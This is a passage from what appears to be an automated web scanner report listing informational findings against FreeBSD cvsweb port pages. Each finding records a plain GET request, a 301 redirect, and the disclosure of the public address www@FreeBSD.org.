Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/py-pynzb/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:18 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.259. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/py-twistedNews previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/py-twistedNews

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/py-twistedNews HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/py-twistedNews/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:23 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7110

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.260. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/py-yenc previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/py-yenc

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/py-yenc HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/py-yenc/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:24 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7103

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.261. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/pyne previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/pyne

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/pyne HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/pyne/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:25 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.262. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/rawdog previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/rawdog

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/rawdog HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/rawdog/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:27 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7102

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.263. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/rkive previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/rkive

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/rkive HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/rkive/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:37 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7101

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.264. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/s-news previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/s-news

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/s-news HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/s-news/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:44 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7102

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.265. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/sabnzbdplus previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/sabnzbdplus

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/sabnzbdplus HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/sabnzbdplus/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:34:57 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7107

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.266. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/slnr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/slnr

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/slnr HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/slnr/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:06 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.267. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/slrn previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/slrn

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/slrn HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/slrn/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:07 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.268. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/slrnconf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/slrnconf

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/slrnconf HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/slrnconf/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:07 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.269. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/slrnface previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/slrnface

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/slrnface HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/slrnface/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.270. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/slurp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/slurp

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/slurp HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/slurp/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7101

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.271. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/sn previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/sn

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/sn HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/sn/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7098

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.272. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/suck previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/suck

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/suck HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/suck/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.273. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/suck-cnews previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/suck-cnews

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/suck-cnews HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/suck-cnews/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7106

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.274. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/tin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/tin

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/tin HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/tin/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7099

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.275. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/trn previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/trn

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/trn HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/trn/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:12 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7099

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.276. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/trn4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/trn4

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/trn4 HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/trn4/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:15 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.277. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/ubh previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/ubh

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/ubh HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/ubh/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:16 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7099

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.278. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/unpost previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/unpost

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/unpost HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/unpost/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:16 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7102

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.279. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/xmitbin previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/xmitbin

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/xmitbin HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/xmitbin/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:17 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7103

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.280. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/xpn previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/xpn

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/xpn HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/xpn/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:17 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7099

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.281. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/xrn previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/xrn

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/xrn HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/xrn/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:17 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7099

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.282. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/yencode previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/yencode

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/yencode HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/yencode/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:18 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7103

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.283. http://www.freebsd.org/cgi/cvsweb.cgi/ports/news/yydecode previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/news/yydecode

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/news/yydecode HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/news/yydecode/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:35:25 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7104

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.284. http://www.freebsd.org/cgi/cvsweb.cgi/ports/www/mozex previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/www/mozex

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/www/mozex HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/www/mozex/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7100

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.285. http://www.freebsd.org/cgi/cvsweb.cgi/ports/www/p5-Apache-NNTPGateway previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/www/p5-Apache-NNTPGateway

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

GET /cgi/cvsweb.cgi/ports/www/p5-Apache-NNTPGateway HTTP/1.1
Host: www.freebsd.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Status: 301 Moved Permanently
Location: /cgi/cvsweb.cgi/ports/www/p5-Apache-NNTPGateway/
Content-Type: text/html
Connection: close
Date: Mon, 24 Jan 2011 16:36:08 GMT
Server: httpd/1.4.x LaHonda
Content-Length: 7116

<head>
<meta name="robots" content="nofollow" />
<meta name="generator" content="FreeBSD-CVSweb 3.0.6" />
<meta http-equiv="Content-Script-Type" content="text/javascript" />
<meta http-equiv="Content-
...[SNIP]...
<a href='http://www.FreeBSD.org/mailto.html'>www@FreeBSD.org</a>
...[SNIP]...

24.286. http://www.freebsd.org/cgi/cvsweb.cgi/ports/www/pnews previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.freebsd.org
Path:	/cgi/cvsweb.cgi/ports/www/pnews

Issue detail

The following email address was disclosed in the response:

www@FreeBSD.org

Request

